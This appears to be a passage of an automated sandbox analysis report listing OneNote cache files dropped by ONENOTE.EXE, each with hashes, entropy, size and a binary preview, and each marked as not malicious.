SHA-512:	B9D7941176DF775D1540E9A877396168B78600B805D13CBD6BC714AE912B8E94B8AB5100F5E2CBA186314FB4B7FB5A05C75ABBE5F2988F5EAAC55E14B0BE2F5A
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZ...........54...6..O.@z...54...6..O.@z.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............?5...-..f.#.#....N...^................?6...B.F..c...........f........................................I.qk..B.....LZ..............?5...-..f.#.#........*..?5...-..f.#.#........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.075388463737207
Encrypted:	false
SSDEEP:	48:YDNsLcHgLkbltfWGEFnIX7k9Ia2ToP9rd2trw1IydXyBRmY9:6NsgSkblBZEFIXw9Ia2Te9Rew7y
MD5:	EBD47F6C6F5EE8B0D32DEC684BFE646E
SHA1:	4175E35BAB3687AFE749DFB532CCF4D733D44CA5
SHA-256:	074E56C32C9E4CD3BD4D897DC22302736521EAE2F22A50536F41CC85573820D6
SHA-512:	6AA84F550960BBC64C5492B383DDE36B086A6C0C41B3CDC3504E941DED8D72BBFEA9F62F6F2B5B49A8CB21C528EDD5C68D04595D51786E2697AAF965686837AE
Malicious:	false
Preview:	2...>......."...v.......................................................................................................................................2...>.......~...v...J............................I.......I.qk..B.....LZt.3.....t.3..f..O=.....t.3..f..O=.....t.3..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............n...0.<8.NN..R....N...^...............Nr.K.>.E......9.........f........................................I.qk..B.....LZ............n...0.<8.NN..R........n...0.<8.NN..R.........t.3.....t.3.....t.3.........................................t.3j....t.3T.]..t.3.....t.3..B..t.3H....t.3..B..t.3..>.)t.3..J...................;........4...4...4.."..............t.3.t.3.t.3..z...y.. x.. ...........$........4......7...7........................;........4...4...4.........t.3.....t.3....#t.3............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.069020641905962
Encrypted:	false
SSDEEP:	96:TW2sQ/JfbtUWw6QQE3XPg9SxW7TqRfHdXscBvJpGY+lzcss9BP:dsQ/JfbtUYQt3XY96W7uRv5scdJpGY+s
MD5:	1D551D3B7FC1389EB14D83482D5B3C02
SHA1:	3BDAB3E957F5B45BE67273E0DC0DE1CC225C97B2
SHA-256:	6520670D430FD676BEAA8D5A28A4D8999DEDF424A0AD6288BC8CA62F82E761ED
SHA-512:	281A3CD4B9E26F7D6FF49519FF12842E5B03E5F0E76DB426BE16FBFDA730007187975B13E7AB893AC40E2D6FFFC0C057DFEA29223692BEAC5F3142F5D5A1C894
Malicious:	false
Preview:	2...>.......&...v.......................................................................................................................................2...>...........v...N............................................3..q....I.......I.qk..B.....LZ.........3..q........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............2...J$..;..mr.D....N...^...................S.:K.z.;............f........................................I.qk..B.....LZ.............2...J$..;..mr.D.........2...J$..;..mr.D........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000018.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.101789036166384
Encrypted:	false
SSDEEP:	48:8np+sTClNp8t9tsEno3CXo92VNTo0rdlrmI5dX3ykgyNKa:8wsKNp81sEVXo92VNTFRphMGNK
MD5:	D0FC5C69C136E742EA300F325B90C0B8
SHA1:	F187B6246FEF81BFF5003E9D5C80004C6DD9180B
SHA-256:	5A4A3F7BB94130619B0232F71D06C52D9F011120E33CAEC8AE2250637E6881C3
SHA-512:	061A164E5634B329F936628070D962566444183E9E18F3FB8F9FEC3BABBC9AA4DA96A0B4AE5562F446454D57CA89665FB4839F3E746A0849DFDE074CDE96444B
Malicious:	false
Preview:	2...>.......&...v.......................................................................................................................................2...>...........v...N............................I.......I.qk..B.....LZ.p.......p......'..D...p......'..D...p...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............@..7p..66.P.7z_....N...^................A....H...r............f........................................I.qk..B.....LZ.............@..7p..66.P.7z_.........@..7p..66.P.7z_..........p.......p.......p...........................................p.j.....p.T.]...p.......p..B...p.H.....p...B...p...>.).p...J...................;........4...4...4.."...............p...p...p...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........p.......p.....#.p.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000019.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.088541314296601
Encrypted:	false
SSDEEP:	48:hsk8GhzH2N8YmtDqutsEdbXM9QWiiToNrddrTIudX6Wk26fEa:hsSz68YmYMsEJXM9QWiiTsRR9Td8E
MD5:	E06E32F4A933B8FE6356D8603A64F31E
SHA1:	6ABCB3936765A10FE1C8AABC5773DAD12869A203
SHA-256:	BBCDB0199D80F485ED8B791CF277B8CFCB44B9D1BFAF2132B076C711C1413A8D
SHA-512:	AF40521A40809CE87C1216D1488B23AF706255545CE63362C9C67201008CC18F5D4CF9D21C057217133954FFA75284B4347FDBB626EAEE6DDBDCD9229906CE13
Malicious:	false
Preview:	2...>.......&...v.......................................................................................................................................2...>...........v...N............................I.......I.qk..B.....LZV.......V....U..-......V....U..-......V....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............u.....6.I..'....N...^................eK*y.KB.....\........f........................................I.qk..B.....LZ.............u.....6.I..'.........u.....6.I..'.........V.......V.......V...........................................V..j....V..T.]..V.......V...B..V..H....V....B..V....>.)V....J...................;........4...4...4.."..............V...V...V....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........V.......V......#V..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001A.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.129924881168355
Encrypted:	false
SSDEEP:	48:2sxqdnZJg0tHHxNktEt4X2l9HdpTowrdjrk3IldXDxdWy9hig:2sYZJg01RyEqX49HdpT9RvkuH
MD5:	14BBCFFE62B212B72461A437EEF33E0F
SHA1:	C194D57C0A0492FF9E75DB3DE4066E944990B485
SHA-256:	5CE2F8DF59E446C4F1345D09606B499DF0EEB39826A2EEE0528B133104967ADE
SHA-512:	9C39D2C2A9C0A6BDD6DD02F82FCF9F03AC4BB70EDD4330F11D1DF6B0AD22C43D7B88962AC29DA2BC75B55B472B430B61D8A840AC06A66C0018B8E10AF4842C32
Malicious:	false
Preview:	2...>.......0...v...$.................................................?....?............................................................................2...>...........v...X............................I.......I.qk..B.....LZ............z...5&.nm.=.....z...5&.nm.=......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............+....h..3lK....S....N...^...............Z.\|.$g\H....eZ&x........f........................................I.qk..B.....LZ............+....h..3lK....S........+....h..3lK....S........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001B.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.188678660686757
Encrypted:	false
SSDEEP:	96:SsehuMxWk0SQu7EPIXw9ZTKRI5DnsuPj3VN:Ss2xWkm5wXw9ZWRI5
MD5:	820D93EA04C69EB4CE45A6DFD3F0692F
SHA1:	FC9C0445A5014DFB7CB124943D9B1CBC350FB3B0
SHA-256:	829C82A08E9588F7B7ECBC1F9D4FB29337A6B77D420A53AF8CF4B2133A57C030
SHA-512:	8AD9B4EA36007DD0D18541470E26C22FFF279155DFA7A128EB29463C599197F568E5A4F16BBBE5CA5B3F9C22B17C378F6E12F375A2B39C72D9C0CA545B473859
Malicious:	false
Preview:	2...>.......0...v...$.................................................?....?............................................................................2...>...........v...X............................I.......I.qk..B.....LZ...........<.UN..<..:.....<.UN..<..:.......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............J#S.V...4[..0.......N...^..................9 OC...]z.U........f........................................I.qk..B.....LZ............J#S.V...4[..0...........J#S.V...4[..0...........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001C.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.112808546217453
Encrypted:	false
SSDEEP:	48:LO0s02RHas9tgMueEBAC+rxIXzTI9/YuB+xToFrdSrYIKdXyOQgN9:LO0s5as9aeEBA7uXA9d2TwRKYR
MD5:	D82379B48C2760656A4C15A8E7EA4560
SHA1:	88273D9F267094C30B87070998B99DB5EF79AF74
SHA-256:	E3B5B4A48C1989A1A13079B0F93505374A2249B6EA72BD35D03FC05CD67176DF
SHA-512:	204942778657839BCAFA4761663BFDAE1A2857530B966C38EE7CAFE2E50DFF0FD762E7B20A367A9B24FFB950222E64C01ED0CEBD7A880669FDA3E3799FD38DF4
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZmI......mI.,.....#.r.-.mI.,.....#.r.-.mI...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............gnaq....19.[2.PB....N...^.................3...(J.....9..........f........................................I.qk..B.....LZ............gnaq....19.[2.PB........gnaq....19.[2.PB.........mI......mI......mI..........................................mI.j....mI.T.]..mI......mI...B..mI.H....mI...B..mI...>.)mI...J...................;........4...4...4.."..............mI..mI..mI...z...y.. x.. ...........$........4......7...7........................;........4...4...4.........mI......mI.....#mI.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001D.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.123250123062601
Encrypted:	false
SSDEEP:	48:hTsxW06d0V1zItvQDBOE7CWbXo935TToerdSrWIXdX1e9MqBJ:hTs8eVJI20E75Xo9lTnRKf+B
MD5:	0092154E71A6D5EEE8E9B020707502F2
SHA1:	EB0DD414001CAF6AE2ACCDD5D831E420B921292E
SHA-256:	75897A7A2D81800DBC70C7D87BF08AC5C3CF29D33463FDCAA5C220C0B5961D87
SHA-512:	9F869E8BE73588DC825761EFBE9A9F334CF9B34C084FA4D3FCA3711D20C13B711F5AD2E25CB92A11D2F1AFB8F3F3F86843D69826B71E68B5E083A4E3BC8F4840
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.h.......h.p......w.X.a.h.p......w.X.a.h...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................6U.....R.......N...^................atH..K.z..............f........................................I.qk..B.....LZ...............6U.....R..............6U.....R.............h.......h.......h...........................................h.j.....h.T.]...h.......h...B...h.H.....h...B...h...>.).h...J...................;........4...4...4.."...............h...h...h...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........h.......h.....#.h.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001E.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.106345285500157
Encrypted:	false
SSDEEP:	96:Rsf02fOxEE4XI90TxsJTVRKmPw96kU9A5y:RsRfrRXI90eJBRKm
MD5:	F293D8AF1ED0D827D2135395A42B7419
SHA1:	D352F9F89DDE4095C27271238C7478AA600CB41F
SHA-256:	A8ACFCDA18A1DBB56C2E64B686FB58FF7A9242D832B249556383F47511F1AE99
SHA-512:	DAC4E609EB1FC51666E6264881C228ED67A699B9DA2A9A8BA5065A5F0A2D004EEB1158FF34FA4A54342E642ACCB49C7A6C84DD6A47A08E6EF6352181F5D304E7
Malicious:	false
Preview:	2...>..........v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ...........DF..2.........DF..2...........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............~.Z.'./0U.......N...^...............`..S.YF.&rjt:.........f........................................I.qk..B.....LZ..............~.Z.'./0U.............~.Z.'./0U...........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001F.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.122434837726065
Encrypted:	false
SSDEEP:	96:mOmMsOuLkIFQ1E2hXA9rXTFRKnZxdisydZOo:FmMsjLkIFtGXA9rXhRKnZ
MD5:	DA5C78A85C6A230BA7511C5A7CDC17D7
SHA1:	DA5AC9808EB834A8D743628E02EA3A00E80528D4
SHA-256:	EAEE1112B2CAC740DBADEE3CA29D230D836F7A0FD79E474F3830853BBC87E2CD
SHA-512:	374505AD6A2C15873E4CE6AFFFE82FF1221B7F5214F0C3D75CEBAF9FF9A9357CC9898F434CB34B47CBFB47C922B955794422581995AAF8A81B8A0DEF78EAA62C
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZiZ&.....iZ&3..3....._2.4iZ&3..3....._2.4iZ&..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............../..e..\.G1.......N...^...............q.m....D...:...........f........................................I.qk..B.....LZ............../..e..\.G1............./..e..\.G1............iZ&.....iZ&.....iZ&.........................................iZ&j....iZ&T.]..iZ&.....iZ&..B..iZ&H....iZ&..B..iZ&..>.)iZ&..J...................;........4...4...4.."..............iZ&.iZ&.iZ&..z...y.. x.. ...........$........4......7...7........................;........4...4...4.........iZ&.....iZ&....#iZ&............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001G.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.145290896022385
Encrypted:	false
SSDEEP:	48:hiEsSlyWsBgMtJeGEG9CCZUYX7bY9DxN1To2rdSrVIXdX1+4Gp:hiEsHBgMFEijX7k9DZTnRKeo
MD5:	F5817A1E01FF711BD0811EC837AB2866
SHA1:	2A20353C6A56E70C1AB55BEF38C058A092D05C54
SHA-256:	099F626A9C25B6F24EC2D0FE60ADEFFE2E3FE8A9075F3064269FD0EBDA0B252B
SHA-512:	2663056E96DC2E2BAD471A5C66AF575ED30FB18BEE9D6E2714D86887AD2EA0DC5DE60D2CE43919CFB3C86EE6F7A33A9D2DD2EC1D98BE4D6738BFE42AF3F12BC5
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZY.......Y..w+E).....v}.2Y..w+E).....v}.2Y....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............,.......W..s......N...^...............(~;._\|/O.a0=...2........f........................................I.qk..B.....LZ.............,.......W..s...........,.......W..s...........Y.......Y.......Y...........................................Y..j....Y..T.]..Y.......Y....B..Y..H....Y....B..Y....>.)Y....J...................;........4...4...4.."..............Y...Y...Y....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........Y.......Y......#Y..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001H.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.025992211095639
Encrypted:	false
SSDEEP:	48:BsKivS0rqg5tgEEOEnpDCZPCX09wvC6ToPrdSr+4IEdXgEfBc7WbHMfOF+zG:BsTzrqg5KQE1hX09ANT2RK+K3bn
MD5:	FE8DB7DD522F38D25E08129FC83FF1A2
SHA1:	877A201342B6E60B1206CDDD8C43D35924CDA024
SHA-256:	1FADC89378584125FEBBC4061AE88C572ECD911B289118BE7C1E1E819C5505BA
SHA-512:	A77E1193D79034C7F670BE03E585A858EAE8BC978CF8ACA19F81263FD70930CEE301B4B2D250D234341BE407727B5533032878F6576B70CCC02DC0245C0D1181
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.................4$@zf.n.........4$@zf.n.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............I....Z....t..+6....N...^...............(......F....u...........f........................................I.qk..B.....LZ.............I....Z....t..+6.........I....Z....t..+6........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001I.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.107212670255703
Encrypted:	false
SSDEEP:	48:ps3dcvYCHlNtd2qEmCKJXo9JALEwBTobrdSrlmIgdXoWkm1:ps/arT1Em3Xo9mL3T6RKlYb
MD5:	0FCA0CD471EC31629EC14D0ADA90C83C
SHA1:	F503CDA0A1A4054A5E85A79AA24FC1BF4D0CCA1B
SHA-256:	F01063535B82D1593627C623B6F54560F81B93053A00D5CFAC1DC9484041D403
SHA-512:	44D0FFE6CEC718AE8208572F64B240907F8397F46EB4E60E8F8B31B652AA64D48901B89C6351B35398F86BE39BCF9985ADFE5FE83EEF031934CE920102695116
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.;6......;6...N../..Omwr.;6...N../..Omwr.;6..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............^.&...!a....v.....N...^.................>.X.AA.T.u.p..........f........................................I.qk..B.....LZ..............^.&...!a....v...........^.&...!a....v...........;6......;6......;6..........................................;6j.....;6T.]...;6......;6..B...;6H.....;6..B...;6..>.).;6..J...................;........4...4...4.."...............;6..;6..;6..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........;6......;6....#.;6............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001J.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.123800460835205
Encrypted:	false
SSDEEP:	48:Kx+zshNyPetqQElCC5gX09KzTo4rdSr+IuSdXjsC0QEC2p:K0s2Pe1ElC7X090TdRK+Su/
MD5:	67F8F97AA97235DDF1E0B619ED03DDE8
SHA1:	E9293AAF5A692E563BA6B37F2DDE837755942E91
SHA-256:	D047F15113A86CEF54982F3EFBA1B22A466EDAE62458FF234D560837DEFC5AEA
SHA-512:	92B948AA563A4D44A5ADC41825F0FE7E838943117DFDC217D38602779E4A48679C23DD3C472159B9CB62B137F84DAC1E7F36717A902337E2AC6F5D1692E7B4AA
Malicious:	false
Preview:	2...>.......,...v... ...................................................................................................................................2...>...........v...T............................I.......I.qk..B.....LZE./.....E./..o..G..!in?E./..o..G..!in?E./..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............b......\n..a......N...^....................n.J.6c.\Knn........f........................................I.qk..B.....LZ..............b......\n..a............b......\n..a...........E./.....E./.....E./.........................................E./j....E./T.]..E./.....E./..B..E./H....E./..B..E./..>.)E./..J...................;........4...4...4.."..............E./.E./.E./..z...y.. x.. ...........$........4......7...7........................;........4...4...4.........E./.....E./....#E./............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001K.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.114296544506017
Encrypted:	false
SSDEEP:	48:KHaJsU9V6LZ2qkXRtukE6tiC+GvXk9GaTonrdSrDIsdXdyd0QRVajJ:K0sQ6N2qiRVE6c74Xk95T+RKDiw
MD5:	E283169A6552ED81F17E7694CDE8A27B
SHA1:	EE945E61801950FEC285CDEB0444DC64D9B9EC49
SHA-256:	99E9B1F4A6656CC7BC9DC11D4C4DFF4AA7C1208A89D9293A5C87E256A08272F8
SHA-512:	2E3BD95C7D130ADF52661E2BBEE265085E9DD2FA55DE9E0FCE9A3ACBF2B7712417468B393994FC210925D21597237921F7B5AA5A0D198FFF630AB217182EEB34
Malicious:	false
Preview:	2...>.......,...v... ...................................................................................................................................2...>...........v...T............................I.......I.qk..B.....LZ.lA......lA].W..4E..92?..lA].W..4E..92?..lA..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............O.uB t..~}.........N...^................*X..%.@.b..C...........f........................................I.qk..B.....LZ.............O.uB t..~}..............O.uB t..~}...............lA......lA......lA..........................................lAj.....lAT.]...lA......lA..B...lAH.....lA..B...lA..>.).lA..J...................;........4...4...4.."...............lA..lA..lA..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........lA......lA....#.lA............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001L.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.141717431122023
Encrypted:	false
SSDEEP:	48:QJIpmskmZlRKtEwDmEIWCCYaXc9EUujF7TomrdSreI/dXB3R11:QipmsHRKuwKEPBXc9EjZ7TvRKP/
MD5:	CEB5E77DF755765DE0C581CBF1606AE6
SHA1:	07B8C6AC24E0599CF7BDFB4214146612D935EA69
SHA-256:	2A63D98DDCC3AE08BB55646D14ABB3C79BDF6602EFDB2945F39571514F83353D
SHA-512:	8BA030BD5F971ABD31F7FFE653EC25C0D842196D08E7CA7C29F50F81123273BAEF97372E560822981B045BB2DD71D9B6B747055567522E97DC0B9AAD8FCEF1CC
Malicious:	false
Preview:	2...>...........v..."...................................................................................................................................2...>...........v...V............................I.......I.qk..B.....LZV.......V...FG........\|}V...FG........\|}V....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............~.6Q!.-.....6`.....N...^...............i.V.\|..B..u.<4..........f........................................I.qk..B.....LZ............~.6Q!.-.....6`.........~.6Q!.-.....6`..........V.......V.......V...........................................V..j....V..T.]..V.......V....B..V..H....V....B..V....>.)V....J...................;........4...4...4.."..............V...V...V....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........V.......V......#V..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001M.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.114643774240227
Encrypted:	false
SSDEEP:	48:dsYzu9UDt82EVC/JXM9/rgToJrdSryIKdXSS86Z:dsrUDJEVUXM9ETERKOl
MD5:	D3AB9E438D2AF50C63DCDC3E19A2DCC1
SHA1:	9943AA30F511AA2BF4BE9AC3ADD641AB8EFF3EFF
SHA-256:	01598A042728ED8CCDA9303C32E6AC0F5AF374F523E2301C55744EB269312754
SHA-512:	66F58E091672365038893F6D4E8D2639D8EA724E00E0985793051249489B9C15903D364516D1F85B17B18CC96BA69B46EBFC10F0A81CB903DA456F25ED2F27A1
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.ni......ni]....'QVX..YC.ni]....'QVX..YC.ni..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............~..,O.E..l...&9M....N...^...............%%..t.~H...............f........................................I.qk..B.....LZ............~..,O.E..l...&9M........~..,O.E..l...&9M..........ni......ni......ni..........................................nij.....niT.]...ni......ni..B...niH.....ni..B...ni..>.).ni..J...................;........4...4...4.."...............ni..ni..ni..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........ni......ni....#.ni............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001N.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.134472419075703
Encrypted:	false
SSDEEP:	96:rAcs0S28m+uvFLEsWMCX09EPTuRKJEurH+8tMr8V7tWrHSFE:ps0p8m+uNI8CX09EPyRKJBy8tMoV7E
MD5:	9E3FCA2A465E2F34B5200CF71294FCC2
SHA1:	869706F9993DF56313059FDC1F37C1332333276F
SHA-256:	AEB4FEFA028EB455ECC3A4075B0E200607189676D4B32FBD52F060E959D97166
SHA-512:	53042C8FC82695668B98A83D4D742BF652CD0425994818BB731DFEF1EDB7DEB40D23388067BB816F0330304E661EA30CCCE0FDE7E41F78C5F571BF6D36F4AB4A
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.....................?...............?.......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'............. .....:..L...s#(....N...^......................F..4.E. .........f........................................I.qk..B.....LZ............ .....:..L...s#(........ .....:..L...s#(........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001O.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.126425259916883
Encrypted:	false
SSDEEP:	96:psgMoMaOJlAZMER3cKX89UylB7TXRKGkw:ps8MaEAZpxTX893tzRKGk
MD5:	7DD2D9E55651BE8C641E56DA583AFD23
SHA1:	959E677D983C83269D079811203DB44DCCB000C2
SHA-256:	9042D3D43D6267E20F10AF692A6058A0BD94F749097F7E163C01C1BD86E45E7A
SHA-512:	287F77C68E7D406CAFA116184480FFA120F55182082F21EB796901E6E1CF17685744ECE4392075C1C2571C693A2D90652B3DA3655DEC398AB1B4A09A2C2F1B2E
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R...........................&.......&..9,.q.........I.......I.qk..B.....LZ&..9,.q........&....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............t.{....9c..>Y......N...^...............Uh.6...O...............f........................................I.qk..B.....LZ............t.{....9c..>Y..........t.{....9c..>Y...........&.......&.......&...........................................&..j....&..T.]..&.......&....B..&..H....&....B..&....>.)&....J...................;........4...4...4.."..............&...&...&....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........&.......&......#&..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001P.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.019241619553836
Encrypted:	false
SSDEEP:	48:PDBsiXvNuU9mHm0t8iENAIWCp2hdX49fXRlvToVCrdSrsoIxfDdXzSKu3wKvxnF:1sQmHr1ENA1s2TX49ZVTBRKsDfDG
MD5:	3AC986FCFDA5B53D79B4CFF61D5986A9
SHA1:	4D5080C8D64A6C37428229A105801576327E16E9
SHA-256:	AA0404882FE65FD56F38B62AC95D3E2F2E79EBC8F329494974694124DCF32F6D
SHA-512:	AEF8215287A99B46BB0B1E99EA341849964A0C21098A22836BD77CF9DFED5EEDB1B4D44B910C56B5ABA7991B0E1740A654C70ADC56B505EB664905C626743D68
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ..#.......#T.b..4.v....-..#T.b..4.v....-..#..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................ty....(...P.n....N...^.................).. .I...%............f........................................I.qk..B.....LZ...............ty....(...P.n...........ty....(...P.n...........#.......#.......#...........................................#j......#T.]....#.......#..B....#H......#..B....#..>.)..#..J...................;........4...4...4.."................#...#...#..z...y.. x.. ...........$........4......7...7........................;........4...4...4...........#.......#....#..#............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001Q.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.108534863835946
Encrypted:	false
SSDEEP:	96:Kqlsqa7tzZPEyrWXk9EkMJT+0RKeH7viWavPAs:/sP7tOyqXk9iq0RKe
MD5:	6A99FE67E1C901787160D6DA404336BB
SHA1:	E3D2C7E5718B3CBB8F867C8CFD5D8F3C6333875E
SHA-256:	E57CE418F8809FD45A2D857C55CCA560E1549304043C4946ACDA86F6B3ACF166
